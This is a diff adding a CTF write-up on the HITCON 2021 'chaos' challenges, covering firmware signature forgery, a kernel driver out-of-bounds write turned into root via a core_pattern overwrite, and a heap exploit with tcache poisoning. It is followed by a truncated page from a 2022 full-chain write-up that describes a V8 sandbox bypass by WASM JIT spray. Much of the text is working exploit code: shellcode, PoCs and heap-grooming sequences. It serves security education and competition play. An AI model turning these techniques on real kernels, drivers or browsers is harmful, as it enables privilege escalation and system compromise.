+dec=pow(0x10001,-1,phi)
+
+act = int.from_bytes(sha256(shellcode).digest(), "little")
+header += int.to_bytes(pow(act, dec, prod(factors)), 256, 'little')
+
+with open("firmware", "wb") as f:
+ f.write(header + shellcode)
+```
+
+Now that we can sign and load our own firmware, we only have to write some code that loads the flag using the `get_flag` syscall and makes it available to the client. The easiest way is to have our client allocate and map a buffer in the CHAOS memory, then send a request to CHAOS. The firmware can then copy the flag in the response buffer and exit. Since we hadn't yet finished reversing the interface between CHAOS and the driver, we just wrote a firmware that copies the flag everywhere in the CHAOS memory instead of finding the buffer that the client is using.
+
+```x86asm
+BITS 64
+DEFAULT rel
+
+dram_size equ 0x100000
+dram_start equ 0x10000000
+dram_end equ dram_start + dram_size
+
+.copy_loop2:
+ ; get flag
+ mov rdi, dram_start
+ mov eax, 0xC89FC
+ syscall
+
+ mov rax, dram_start + 0x50
+
+ .copy_loop
+ mov rsi, dram_start
+ mov rdi, rax
+ mov rcx, 0x50
+ rep movsb
+
+ add rax, 0x50
+ cmp rax, dram_end
+ jb .copy_loop
+
+jmp .copy_loop2
+
+; exit
+mov edi, 0
+mov eax, 60
+syscall
+```
+
+```c
+struct request {
+ int field_0;
+ int field_4;
+ int field_8;
+ int field_c;
+ int field_10;
+ int field_14;
+ int out_size;
+};
+
+int main(void)
+{
+ int fd = open("/dev/chaos", O_RDWR);
+ assert(fd >= 0);
+
+ assert(ioctl(fd, 0x4008CA00, 0x1000) >= 0);
+
+ uint8_t *mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+ assert(mem != MAP_FAILED);
+
+ struct request req = {
+ .field_0 = 1,
+ .field_4 = 0,
+ .field_8 = 32,
+ .field_c = 256,
+ .field_10 = 32,
+ .field_14 = 0,
+ .out_size = 256,
+ };
+ ioctl(fd, 0xC01CCA00, &req);
+
+ write(1, mem + 0x20, 0x50);
+
+ return 0;
+}
+```
+
+Flag: `hitcon{when the secure bootloader is not secure}`
+
+## Part 2: Kernel
+
+The flag for this part is in the VM, only readable to root. This means that we have to somehow exploit the kernel from our unprivileged client to become root. We control both the userspace client and the firmware, so we can attack the kernel from both sides.
+
+### DMA attack
+
+CHAOS uses a virtual PCI device. PCI is interesting from an attacker's point of view because it is bus mastering, which means that the devices can DMA to the host's memory. Pwning the kernel from such a device would be really easy because the device can read and write to all of physical memory. Unfortunately the virtual PCI device in Qemu doesn't use DMA, so it's impossible to DMA to the host memory from the device's firmware. All that the firmware can do is to write to its MMIO registers and its dedicated memory. Too bad.
+
+### CHAOS driver analysis
+
+We cannot directly attack the VM's kernel from the firmware, so it is very likely that we will need to find a bug in the driver and exploit it. We spent a few hours reversing the driver and understanding how it works and eventually found some bugs.
+
+Recall that the driver uses two ring buffers to communicate with CHAOS. The driver puts commands in the command queue and receives responses in the response queue. Here is the code that adds a new command to the queue:
+
+```c
+int chaos_mailbox_request(struct chaos_mailbox *mailbox, struct chaos_request *req)
+{
+ struct chaos_cmd_desc cmd_desc = {0};
+
+ // Generate a request ID.
+ int request_id = _InterlockedExchangeAdd(&mailbox->request_id, 1) + 1;
+
+ // Copy the request to the CHAOS memory.
+ int ret = chaos_dram_alloc(mailbox->chaos_state->dram_pool, 28LL, &dram_request);
+ if (ret != 0) {
+ return ret;
+ }
+
+ struct chaos_req *dram_req = dram_request.virt_addr;
+ memcpy(dram_req, req, sizeof(struct chaos_request));
+
+ struct chaos_state *chaos_state = mailbox->chaos_state;
+ uint64_t cmd_tail = chaos_state->csrs.virt_addr->cmd_tail;
+
+ mutex_lock(&mailbox->cmdq_lock);
+ uint64_t cmd_head = chaos_state->csrs.virt_addr->cmd_head;
+
+ // Check if the command queue is already full.
+ if ((cmd_head ^ cmd_tail) == 512) {
+ mutex_unlock(&mailbox->cmdq_lock);
+ chaos_dram_free(pool, &dram_request);
+ return -16;
+ }
+
+ cmd_desc.req_id = request_id;
+ cmd_desc.unk = 1;
+ cmd_desc.buf_offset = dram_request.phys_addr - pool->dram_io_map->phys_addr;
+ cmd_desc.size = 28;
+
+ // Add the request to the command queue.
+ memcpy(&mailbox->cmd_queue.virt_addr[cmd_head & 0xfffffffffffffdff], &cmd_desc, sizeof(cmd_desc));
+ chaos_state->csrs.virt_addr->cmd_head = (cmd_head + 1) & 0x3FF;
+ mutex_unlock(p_cmdq_lock);
+
+ // Set the response to pending in the response queue.
+ int resp_idx = request_id & 0x1FF;
+ mailbox->responses[resp_index].result = -100;
+
+ // Send an interrupt to the device.
+ chaos_state->csrs.virt_addr->device_irq = 1;
+
+ _cond_resched();
+ uint32_t result = mailbox->responses[resp_index].result;
+ bool timed_out = false;
+
+ // Wait for the request to complete.
+ if (result == -100) {
+ long time_left = 2000;
+
+ struct wait_queue_entry wq_entry;
+ init_wait_entry(&wq_entry, 0);
+
+ prepare_to_wait_event(&mailbox->waitq, &wq_entry, 2LL);
+
+ // Wait up to 2000 jiffies.
+ result = mailbox->responses[resp_index].result;
+ while (time_left != 0 && result == -100) {
+ time_left = schedule_timeout(time_left);
+ prepare_to_wait_event(&mailbox->waitq, &wq_entry, 2LL);
+ result = mailbox->responses[resp_index].result;
+ }
+
+ timed_out = time_left == 0 && result == -100;
+ finish_wait(&mailbox->waitq, &wq_entry);
+ }
+
+ chaos_dram_free(pool, &dram_request);
+
+ if (timed_out) {
+ return -110;
+ }
+
+ if ((result & 0x80000000) != 0) {
+ dev_err(mailbox->chaos_state->device, "%s: fw returns an error: %d", "chaos_mailbox_request", result);
+ return -71;
+ }
+
+ req->out_size = result;
+
+ return 0;
+}
+```
+
+This function can write out of bounds of the command queue (which has size 512) if the head index of the command queue is greater than 512. At first glance it looks like this can never happen because the driver always ANDs the value of the head index with 0x3FF when incrementing it and then again with 0xdff when accessing the queue, so the index should always be at most 511. However the driver is not the only component that can modify the head index. The firmware also has access to it and can set it to arbitrary values. The following PoC sets the index to a very big value and panics the kernel with a page fault:
+
+```c
+int main(void)
+{
+ int fd = open("/dev/chaos", O_RDWR);
+ assert(fd >= 0);
+
+ assert(ioctl(fd, 0x4008CA00, 0x1000) >= 0);
+
+ uint8_t *mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+ assert(mem != MAP_FAILED);
+
+ struct request req = {
+ .field_0 = 1,
+ .field_4 = 0,
+ .field_8 = 32,
+ .field_c = 256,
+ .field_10 = 32,
+ .field_14 = 0,
+ .out_size = 256,
+ };
+ ioctl(fd, 0xC01CCA00, &req);
+ ioctl(fd, 0xC01CCA00, &req);
+
+ return 0;
+}
+```
+
+```x86asm
+BITS 64
+DEFAULT rel
+
+csr_start equ 0x10000
+
+; overwrite the command queue's head pointer.
+mov rax, 0x4141414141414141
+mov [csr_start + 0x50], rax
+
+; exit
+mov edi, 0
+mov eax, 60
+syscall
+```
+
+```
+[ 2.964179] general protection fault, probably for non-canonical address 0x505019505070504d: 0000 [#1] SMP NOPTI
+[ 2.965393] CPU: 0 PID: 78 Comm: run Tainted: G O 5.15.6 #5
+[ 2.966232] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014
+[ 2.967558] RIP: 0010:chaos_mailbox_request+0x159/0x2e0 [chaos]
+[ 2.968249] Code: 48 89 d0 48 83 c2 01 80 e4 fd c7 44 24 2c 1c 00 00 00 81 e2 ff 03 00 00 4c 8d 04 40 4a 8d 04 80 4c 8b 44 24 23 48 03 44 24 10 <4c> 89 00 44 8b 44 24 2b 44 89 40 08 44 0f b6 44 24 2f 44 88 40 0c
+[ 2.970407] RSP: 0018:ffffc900001b7df8 EFLAGS: 00010207
+[ 2.971016] RAX: 505019505070504d RBX: ffffc900001b7ec4 RCX: 0000000000000002
+[ 2.971841] RDX: 0000000000000142 RSI: 0000000000000100 RDI: ffff888003f39058
+[ 2.972662] RBP: ffff888003eff2e8 R08: 0040000100000002 R09: ffffc90000204000
+[ 2.973483] R10: 000000000000003c R11: 00000000000000ca R12: 0000000000000000
+[ 2.974303] R13: 4141414141414141 R14: ffff888003f39028 R15: ffff888003f421a8
+[ 2.975126] FS: 0000000000408718(0000) GS:ffff88801f200000(0000) knlGS:0000000000000000
+[ 2.976047] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 2.976704] CR2: 000000000042eb90 CR3: 0000000003f68000 CR4: 00000000000006f0
+[ 2.977526] Call Trace:
+[ 2.977820]
+[ 2.978071] ? selinux_file_ioctl+0x16f/0x210
+[ 2.978582] chaos_fs_ioctl+0x11c/0x230 [chaos]
+[ 2.979108] __x64_sys_ioctl+0x7e/0xb0
+[ 2.979560] do_syscall_64+0x3b/0x90
+[ 2.979981] entry_SYSCALL_64_after_hwframe+0x44/0xae
+```
+
+The interrupt handler, which reads the result queue, has the same bug but this time it reads out of bounds instead of writing:
+
+```c
+void chaos_mailbox_handle_irq(struct chaos_mailbox *mailbox)
+{
+ struct chaos_state *chaos_state = mailbox->chaos_state;
+ struct chaos_resp_desc *result_queue = mailbox->output_queue.virt_addr;
+ raw_spin_lock(&mailbox->spinlock);
+ uint64_t i = chaos_state->csrs.virt_addr->result_head;
+ while (i != chaos_state->csrs.virt_addr->result_tail) {
+ desc = &result_queue[i & 0xfffffffffffffdff];
+ i = (i + 1) & 0x3FF;
+ id = desc->req_id;
+ result = desc->result;
+ resp = &mailbox->responses[desc->req_id & 0x1FF];
+ resp->req_id = id;
+ resp->result = result;
+ }
+ chaos_state->csrs.virt_addr->result_head = i;
+ spin_unlock(&mailbox->spinlock);
+ _wake_up(&mailbox->waitq, 3, 1, 0);
+}
+```
+
+This gives us an out of bounds read/write, which should be enough to completely own the kernel.
+
+### Exploit
+
+The bug we found gives us an out of bounds write relative to the address of the command queue. The index is 64-bit so we can write to almost any address (bit 9 of the index is cleared before accessing the queue). We can write a 13-byte command descriptor containing predictable data.
+
+```c
+struct __attribute__((packed)) chaos_input_rb_desc {
+ // Set by the driver, but predictable.
+ uint16_t req_id;
+ // Always 0
+ uint16_t gap;
+ // Always 1
+ uint8_t unk;
+ // Set by the driver, value between 0 and 0x100000
+ uint32_t buffer_offset;
+ // Always 28
+ uint32_t buffer_size;
+};
+```
+
+To get an idea of where our buffer could be and what could be around it we had a look at the kernel's documentation, which includes a [map of the kernel's address space on x86](https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt). The command queue is located in the CHAOS device memory, and the driver uses `devm_ioremap` to map that region into virtual memory. `ioremap` allocates virtual memory from the vmalloc region (`0xffffc90000000000-0xffffe90000000000` on x86_64), so the ring buffer will be somewhere in that region. After looking around in GDB for a while we noticed that the kernel stack of our process is also located there. This makes sense, because the kernel's stacks are also [allocated](https://elixir.bootlin.com/linux/latest/source/kernel/fork.c#L246) from the vmalloc region by default. However even more importantly it looked like the kernel's stack is at a constant, or at least predictable, offset from the command queue. This means that we should be able to reliably overwrite a specific value saved on the stack with contorlled data without needing any leaks.
+
+There are many ways to exploit this. The target VM has no SMEP and no SMAP, which means that we can redirect any kernel data and code pointers to memory controlled by us in userspace. With some trial and error to figure out which offsets would overwrite what value, we found that offset `0x13b13b13b13ad88c` reliably overwrites a saved `rbp` on the kernel's stack. This value depends on what other `vmalloc` allocations the kernel did before running the exploit so it's somewhat specific to the setup we used but it works reliably. The overwrite clears the top 16 bits of the saved `rbp`, which redirects it to a userspace address. We can mmap this address and gain control of the kernel's stack as soon as the kernel executes a `leave` instruction. We then only have to fill the fake stack with a pointer to some shellcode.
+
+```c
+static void alloc_rbp(size_t offset) {
+ uint64_t *rbp = mmap(0x00000003001cf000 + 0x040000000*offset, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
+ assert(rbp != MAP_FAILED);
+ for (size_t i = 0; i < 0x1000 / 8; i++) {
+ rbp[i] = &pwn_kernel;
+ }
+}
+```
+
+The shellcode is pretty simple: it reads the IA32_LSTAR, which contains the address of the system call handler, to recover address of the kernel and then overwrites `core_pattern` with the path to our exploit. It then executes `swapgs; sysret` to return to userspace. The exploit returns to userspace at an invalid address and crashes, which runs the core dump handler, which is now our exploit itself. The core dump handler runs as root, so our exploit can read the flag and print it to the serial console.
+
+```x86asm
+BITS 64
+DEFAULT rel
+global pwn_kernel
+
+kernel_base equ 0xffffffff81000000
+syscall_handler_off equ 0xffffffff81c00000 - kernel_base
+core_pattern_off equ 0xffffffff82564060 - kernel_base
+
+pwn_kernel:
+ ; read IA32_LSTAR, which contains the address of the syscall handler
+ mov ecx, 0xc0000082
+ rdmsr
+ shl rdx, 32
+ or rax, rdx
+
+ mov rbx, syscall_handler_off
+ sub rax, rbx
+ ; rbx = kernel base
+ mov rbx, rax
+
+ mov rax, core_pattern_off
+ mov rcx, rbx
+ ; rcx = core_pattern
+ add rcx, rax
+
+ ; overwrite core_pattern
+ mov rbx, '|/home/c'
+ mov [rcx], rbx
+ mov rbx, 'haos/run'
+ mov [rcx + 8], rbx
+ xor ebx, ebx
+ mov [rcx + 16], rbx
+
+ ; return to userspace and crash
+ xor ecx, ecx
+ mov r11, 0x002
+ swapgs
+ sysret
+```
+
+```c
+int main(int argc, char* argv[])
+{
+ if (getuid() == 0) {
+ system("cat /flag > /dev/ttyS0");
+ return 0;
+ }
+ /* ... */
+}
+```
+
+Flag: `hitcon{so this is how we attack kernel from a device}`
+
+## Part 3: Sandbox
+
+### Analysis
+
+The flag for part 3 is also a file outside the sandbox. However unlike in part 1, there is no system call that copies the flag into the CHAOS memory for us. The sandbox only opens the file that contains the third flag, but then doesn't do anything with it. Clearly this means that we must somehow pwn the sandbox and read the contents of the file somewhere into shared memory where our firmware can access them. As we mentioned before, the sandbox has some system calls that let the chip perform some cryptographic operations on data supplied by the firmware. More specifically, the sandbox implements the following:
+
+* MD5
+* SHA256
+* AES encrypt/decrypt
+* RC4 encrypt/decrypt
+* Blowfish encrypt/decrypt
+* Twofish encrypt/decrypt
+* Threefish encrypt/decrypt
+
+Except for MD5 and SHA256, all of these operations also need a key. The client can use the `add_key` and `delete_key` to add and remove keys from the sandbox's key storage. The key storage is implemented as a `std::map`, which maps a key ID to the key data and is implemented using a search tree.
+
+Now, except for MD5, SHA256 and RC4 all of the algorithms implemented in the sandbox are block ciphers, which take a fixed-size block of input and produce a block of output having the same size as the input. The block size is usually a fixed value chosen by the designers of the algorithm.
+
+Consider now the function that implements Threefish encryption, which has a block size of 32 bytes:
+
+```c
+void threefish_encrypt(struct buffer *output, struct buffer *key, struct buffer *input)
+{
+ if (key->size != 32) {
+ _exit(2);
+ }
+
+ size_t size = input->size;
+ if ((size & 7) != 0 || size > 0x20) {
+ _exit(2);
+ }
+
+ output->data = NULL;
+ output->size = size;
+
+ if ((unsigned int)(size - 1) > 0xFFFFF) {
+ _exit(2);
+ }
+
+ uint8_t *out = new uint8_t[size];
+ output->data = out;
+ do_threefish_encrypt(key->data, key->size, input->data, out);
+}
+```
+
+While the function checks that the size of the input is not bigger than the block size, it doesn't check that it's exactly equal to the block size. On top of that it allocates an output buffer whose size is the same as the size of the input, rather than a fixed-size buffer. This means that the encryption can write out of bounds if we pass it an input buffer that is smaller than 32 bytes. All block ciphers have this bug but it's only exploitable with threefish because it's the only cipher with a block size greater than 24 bytes, which is the smallest usable buffer returned by glibc's malloc. This bug gives us a 8-byte out of bounds read and an 8 byte out of bounds write on a heap chunk of size 24 (the input data is also assumed to be 32 bytes).
+
+Ok, so we have a heap overflow and overread, how can we exploit this? Fortunately, if we do overflow, we do so directly into the size field of the next chunk. Therefore, our goal was to overflow the size field of a small chunk with a large size. However, there were a bunch of complications before achieving this.
+
+The biggest issue we were facing, is the fact that both encryption and decryption do not (directly) allow for a controlled overflow. Encryption, of course, leads to mostly gibberish in the overflown area. Furthermore, since our input also has to be smaller than 32 bytes, part of the encryption input is from the next heap chunk! This also makes it nontrivial to get a controlled overflow with decryption, since we do not control part of the encrypted input, that will be decrypted.
+
+The intended solution here, was to use crypto to your advantage and figure out a way, such that known but not controlled input also decrypts to something you wanted. However, we found a much easier approach, that did not involve pinging our crypto people on discord ;).
+
+We first present the heap setup we want to have, then how we actually achieved that.
+The basic setup we need, is the following, where the three separate parts of the heap, can be anywhere.
+
+![](chaos2.jpg)
+
+
+The sizes shown are the actual sizes used by malloc (so rounded up to the nearest 0x10).
+Furthermore, except the sizes for the input / output chunks, the other sizes are not particularly specific.
+However, we do need to have `sizeof(L) >> sizeof(S)`. The goal is to now roughly have the following happen [^1]:
+
+```c
+void* I_E = malloc(0x20);
+void* O_E = malloc(0x20);
+void* I_D = O_E;
+void* O_D = malloc(0x20);
+threefish_encrypt(I_E, O_E);
+threefish_decrypt(I_D, O_D);
+```
+
+In particular, the purpose of the different chunks are as follows:
+
+- $I_E$: input to the threefish encryption using overflow. The encryption will read the size of the next chunk $L$ oob, as the last 8 bytes of input.
+- $O_E$ / $I_D$: output of the threefish encryption, but then also input of the threefish decryption. During encryption, the size of the next chunk will be overwritten. During decryption, the size of the next chunk will be read oob, as the last 8 bytes of input.
+- $O_D$: output of the threefish decryption. The size of the next chunk will be overwritten, with the last 8 bytes of output.
+- $L$: A large chunk. We will overwrite the size of $S$, with this size.
+- $D$: A chunk that is never freed. Since we corrupt the size with the encryption, we do not want to free it, otherwise malloc is unhappy.
+- $S$: A small chunk. Target for our overwrite.
+
+This works out well, since we do not change the input of our encryption before decryption, the output of the decryption must be the same as our initial input. Since the initial input's last 8 bytes was a large size, the small size of $S$ will be overwritten with this large size. If we now allocate $S$, free it again, it will be in the tcache of a much larger size than it should be. We can then allocate a chunk of size $0x150$ and get back $S$. Then we have a fully controlled overflow of a much larger area of the heap.
+
+This whole procedure is shown in the image below:
+
+![](chaos3.jpg)
+
+So our goal is now clear, we need the specific heap layout and allocations mentioned before.
+But how do we get there?
+
+There are two major pain points in trying to achieve this.
+Firstly, the heap is not in a clean state when we start our exploit, since the firmware loading also uses the heap already.
+Secondly, there are no good malloc and free primitives. To get the heap into a certain state, ideally we would be able to malloc and free arbitrary sizes. The best primitive we found, was the addition and removal of keys. While it allows us to malloc an arbitrarily sized chunk and free it later, it also has a major drawback. The malloc of the size we control, happens in between a `malloc(0x10)` and a `malloc(0x30)`. The former to act as a kind of wrapper around our malloc'd buffer, the latter as the node in a red-black-tree. This is the case, because the different keys are saved inside an `std::map`.
+
+Astute readers will have noticed, that the wrapper struct is actually of the same size as our target buffers to overflow.
+In fact, both of these pain points can help us out in certain ways.
+
+We will now show the heap feng shui of our exploit, then explain why the different allocations work and how they help us towards our goal. But first, we explain the `do_malloc` and `do_free` functions. These correspond to adding and removing a key respectively. As such, a simplified view of these is basically:
+
+```c
+size_t do_malloc(size_t size) {
+ void* buffer = malloc(0x10);
+ void* key_buf = malloc(size);
+ void* tree_node = malloc(0x30);
+ size_t key_id = curr_id;
+ curr_id++;
+ keys[key_id] = (buffer, key_buf, tree_node);
+}
+
+void do_free(size_t key_idx) {
+ (buffer, key_buf, tree_node) = keys[key_id];
+ free(tree_node);
+ free(key_buf);
+ free(buffer);
+}
+```
+
+Now our heap feng shui is written as:
+
+```c
+size_t first = do_malloc(0x80);
+
+size_t inp_prepare = do_malloc(0x150);
+size_t dont_free = do_malloc(0x70);
+size_t small = do_malloc(0x50);
+
+size_t reserved_for_later = do_malloc(0x80);
+size_t reserved_for_later2 = do_malloc(0x80);
+
+do_free(dont_free);
+do_free(first);
+size_t dont_free2 = do_malloc(0x70);
+size_t dont_free_begin = do_malloc(0x90);
+do_free(small);
+do_free(dont_free_begin);
+do_free(inp_prepare);
+```
+
+Since `do_malloc` first allocs a chunk of size 0x20, then our desired size, we can use it as a primitive for achieving the three parts of the heap we need, as long as the two mallocs happen from a contiguous region. Thankfully, the firmware was allocated as a large heap chunk and after freeing it, put in the unsorted bin. Therefore, as long as our allocation size's tcache is empty, the malloc happens contiguously from this unsorted bin. Hence, our chunks from before can be identified:
+
+- $I_E$ ` = inp_prepare.buffer`
+- $O_E$ / $I_D$ ` = dont_free.buffer = dont_free_begin.buffer`
+- $O_D$ ` = small.buffer`
+- $L$ ` = inp_prepare.key_buf`
+- $D$ ` = dont_free.key_buf = dont_free2.key_buf`
+- $S$ ` = small.key_buf`
+
+This also explains the very first allocation. It is done to remove the single 0x20 chunk currently in the tcache.
+`inp_prepare` then corresponds to our first heap part, the first input buffer and the large chunk.
+`dont_free` corresponds to the second heap part, while `small` to the third.
+Both `reserved_for_later` use a key_buf chunk on the tcache, while the tree_node will be allocated just after our small chunk.
+This will be our target for overwriting with the controlled overflow later.
+
+Finally, we have to do some freeing to get our tcache in the correct order. In the end, we would like the have the following tcache for 0x20:
+
+```
+head -> inp_prepare.buffer -> dont_free.buffer -> small.buffer
+```
+
+To this end, we first swap the buffer struct used for `dont_free` and `first`. Otherwise, we would have to free `dont_free.key_buf`, which we do not want! For that, we first free it temporarily, leading to the following tcache 0x20:
+
+```
+head -> first.buffer -> dont_free.buffer
+```
+
+Furthermore, `dont_free.key_buf` is the head of tcache 0x70. Therefore, `do_malloc(0x70)`, will use `first.buffer` as the buffer, and `dont_free.key_buf` as its key_buf. Since we never touch the result of this malloc (`dont_free2`) again, we can be safe that `dont_free.key_buf` (or as named above $D$) is never freed! Lastly, `dont_free_begin.buffer` now points to `dont_free.buffer` and hence the last three frees achieve exactly the tcache layout we want.
+
+Therefore, the next part of our exploit looks as follows:
+
+```c
+res = do_crypto(THREEFISH_ENC, random_data, 24, test_key_idx);
+if (res < 0) {
+ puts("enc failed");
+}
+
+memcpy(temp_crypt, crypt_result, 24);
+
+size_t rid_of_inp = do_malloc(0x140);
+
+res = do_crypto(THREEFISH_DEC, temp_crypt, 24, test_key_idx);
+
+if (res < 0) {
+ puts("dec failed");
+}
+
+puts("smashed size!");
+```
+
+First we encrypt. This will use the first entry in the tcache as input, the second as output. Then we make sure to remove the first entry in the tcache. Next we decrypt, and again first entry in tcache is input (previously of course our output), the second as output. This all leads to our desired goal, of smashing the size of `small.key_buf` with `0x160`.
+
+We now malloc and free `small.key_buf`, to put it onto the correct tcache:
+
+```c
+size_t small_smashed = do_malloc(0x50);
+do_free(small_smashed);
+```
+
+The next time we add a key of size `0x150`, we will overflow `small.key_buf` by a lot!
+We now free the chunks reserved for later:
+
+```c
+do_free(reserved_for_later2);
+do_free(reserved_for_later);
+```
+
+This will now do the following for the tcache of size 0x40 (remember those chunk's tree_node were allocated after `small.key_buf`):
+
+```
+head -> reserved_for_later.tree_node -> reserved_for_later2.tree_node -> ...
+```
+
+When we now overflow `small.key_buf`, we can set `fd` of the chunks that are in tcache.
+Due to the way the allocations work, we need to create some fake chunks first, which we point to.
+The fake chunks are created as follows inside dram:
+
+```c
+puts("Creating fake chunks");
+
+uint64_t* fake_chunk = dram + 0x20000;
+uint64_t* fake_chunk2 = dram + 0x20080;
+fake_chunk[-1] = 0x41;
+fake_chunk[0] = fake_chunk2;
+fake_chunk[1] = 0;
+
+fake_chunk2[-1] = 0x41;
+// this is the address we actually wanna overwrite
+fake_chunk2[0] = fd_addr;
+fake_chunk2[1] = 0;
+
+uint64_t* fake_chunk4 = dram + 0x20100;
+fake_chunk4[-1] = 0x21;
+fake_chunk4[0] = 0;
+fake_chunk4[1] = 0;
+
+uint64_t* fake_chunk3 = dram + 0x20180;
+fake_chunk3[-1] = 0x21;
+fake_chunk3[0] = fake_chunk4;
+fake_chunk3[1] = 0;
+```
+
+Now we can finally overflow:
+
+```c
+puts("smashing actual chunks");
+
+memset(overwrite, 'A', sizeof(overwrite));
+
+uint64_t* over = &overwrite[0];
+
+// Due to the free of the reserved_for_later chunks
+// We also need to fixup these buffer chunks on the heap.
+over[31] = 0x21;
+over[32] = fake_chunk3;
+over[33] = 0;
+// This is our actual target!
+over[23] = 0x41;
+over[24] = fake_chunk;
+over[25] = 0;
+
+size_t my_key = add_key(overwrite, sizeof(overwrite));
+```
+
+The tcache for 0x20 and 0x40 now looks as follows:
+
+```c
+head[0x20] -> reserver_for_later.buffer -> fake_chunk3 -> fake_chunk4
+head[0x40] -> fake_chunk -> fake_chunk2 -> fd_addr // location of flag1 file descriptor
+```
+
+Hence, if we create two keys of length 0x30, the second key allocation will be overwriting fd_addr, allowing us to change the file descriptor from flag1 to the one for flag3. Then we can just reuse our exploit for the first flag:
+
+```c
+uint32_t* fd_over = &fd_overwrite[0];
+// remote:
+*fd_over = 1;
+// local:
+// *fd_over = 4;
+size_t fd_key = add_key(fd_overwrite, 0x30);
+size_t fd_key2 = add_key(fd_overwrite, 0x30);
+
+puts("Read flag");
+
+while (true) {
+ syscall1(0xC89FC, dram);
+
+ printf("flag: %s\n", dram);
+
+ for (int i = 0x100; i < 0x50000; i += 0x100) {
+ memcpy(dram + i, dram, 0x100);
+ }
+}
+```
+
+[^1]: Note that the mallocs will actually happen at different times, this is just to illustrate the basic idea.
+
+Flag: `hitcon{threefishes~sandbox~esacape}`
+
+## Conclusion
+
+Thanks to david942j and lyc for putting together this series of challenges, they were really fun to solve. You can find the source code for the challenges together with the official solution [on github](https://github.com/david942j/hitcon-2021-chaos). Until next time!
diff --git a/HITCON-2021/pwn/chaos1.jpg b/HITCON-2021/pwn/chaos1.jpg
new file mode 100755
index 0000000..c0bfe6e
Binary files /dev/null and b/HITCON-2021/pwn/chaos1.jpg differ
diff --git a/HITCON-2021/pwn/chaos2.jpg b/HITCON-2021/pwn/chaos2.jpg
new file mode 100755
index 0000000..6c2483f
Binary files /dev/null and b/HITCON-2021/pwn/chaos2.jpg differ
diff --git a/HITCON-2021/pwn/chaos3.jpg b/HITCON-2021/pwn/chaos3.jpg
new file mode 100755
index 0000000..53632df
Binary files /dev/null and b/HITCON-2021/pwn/chaos3.jpg differ
diff --git a/HITCON-2022/index.html b/HITCON-2022/index.html
new file mode 100755
index 0000000..87d4368
--- /dev/null
+++ b/HITCON-2022/index.html
@@ -0,0 +1,239 @@
+
+
+
+
+
+HITCON CTF 2022 | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
All these years of training has lead to this moment.
+
+
Show us who’s the best pwner in the world !
+
+
+
The last challenge in the series is about chaining together the four bugs. The challenge runs Linux with the vulnerable module inside the patched Virtualbox, and runs the patched Chromium with both bugs inside this VM. We can provide the URL of our own webpage and the challenge will open it in the patched Chromium. We have to get the flag which is outside the VM.
+
+
Escaping the VM once we have a root shell inside is easy, we only need to load the exploit module from the VM escape challenge. Getting a root shell from an unsandboxed unprivileged shell is also easy because we can reuse the kernel exploit from the kernel challenge. The only part that is slightly more problematic is chaining the renderer compromise with the browser sandbox escape.
+
+
The sandbox escape needs to send Mojo messages to the browser process to interact with the vulnerable IPC service. The easiest way to do that from a compromised renderer is to enable MojoJS. Using MojoJS also means that we can reuse the exploit from the sandbox escape part unmodified which is nice because it saves us some work. There is a well-documented way to enable Mojo in a compromised renderer with arbitrary R/W, described by Mark Brand in a Project Zero bug. I reused the code that I wrote for the Full Chain challenge at Google CTF 2021 for this.
+
+
Now the only thing we need is arbitrary read and write in the renderer. Unfortunately we had cheesed the V8 challenge by loading the flag into the sandboxed heap with Realm.eval instead of actually bypassing the V8 sandbox. This was good enough for that challenge where we only had to read a file, but it won’t work here. We need an actual bypass for the V8 sandbox.
+
+
Uncheesing the V8 Exploit
+
+
Earlier this year DiceCTF had a challenge where players had to find bypasses for the V8 sandbox. The sandbox is now enabled by default in V8 but it’s still pretty new and there are many bypasses that haven’t been fixed yet. Funnily enough I had discovered the Realm.eval cheese when attempting to solve that challenge near the end of the CTF but I couldn’t use it because the flag was located at an unguessable path. I remembered that Kylebot from Shellphish had published a writeup for that challenge so I started by reading it.
+
+
Kylebot’s bypass uses WASM and overwrites imported_mutable_globals in a WasmInstance object to get arbitrary read and write. Unfortunately this bypass has been patched out and doesn’t work anymore in the version of V8 used in this challenge. Even then I still thought I should take a look at the WasmInstance because it had a lot of native pointers in Kylebot’s writeup:
Most of the pointers appear to be sandboxed now but there are still a few that are not. I started experimenting by overwriting each of those with 0x41414141 in GDB before calling into the wasm code and got some crashes. The most interesting one was from overwriting the pointer at offset 0x60 because it gave us RIP control:
This is very interesting because even though we can’t directly overwrite the generated machine code (which is RWX) we can still place some controlled data there by embedding it in immediates and then jumping into the middle of the immediate by overwriting this pointer (JIT spray attack).
+
+
Interestingly, Kylebot notes in his writeup that
+
+
+
After a few trials, I still couldn’t let V8 to dereference this pointer. After following the trace, @adamd and I found out that the real pointer used for invoking the shellcode resides on ptmalloc heap, which is outside of the cage.
+
+
+
It seems that this might have changed in newer versions of V8 and that this attack is now possible.
+
+
The gist of the attack is that we will compile a WASM function similar to this
and choose the floating-point values so that their binary encoding is also valid machine code. By jumping into the next imediate when we run out of space we can construct an arbitrarily-long instruction sequence. And since V8’s WASM compiler is deterministic we just have to add an offset to the pointer we were just overwriting to execute our sprayed shellcode.
+
+
By inspection in GDB we can see that the calling convention that V8 uses for WASM is register-based with 32-bit integer arguments passed in eax, edx, ecx and integer values are returned in eax. The following shellcode gives us arbitrary read and write outside of the sandbox 1:
Except, there is a slight problem. The code pointer that we are overwriting only seems to be used once, the first time a function in that WASM instance is called. After that it’s not used anymore and the JIT spray doesn’t work. This probably has to do with lazy compilation. Creating a new WASM instance every time we want to read or write almost works, but not quite. It seems that V8 also has a cache of compiled WASM bytecode, so if we attempt to create two completely different WASM modules that use the same bytecode it will only compile the code once, so the JIT spray attack only works on the first.
+
+
Our solution was simply to change the WASM bytecode every time we create a new instance. We just selected some byte that didn’t appear to have an effect on the shellcode when changed and wrote some JavaScript that increments that byte every time we create a new WASM instance. Very hacky but it works.
+
+
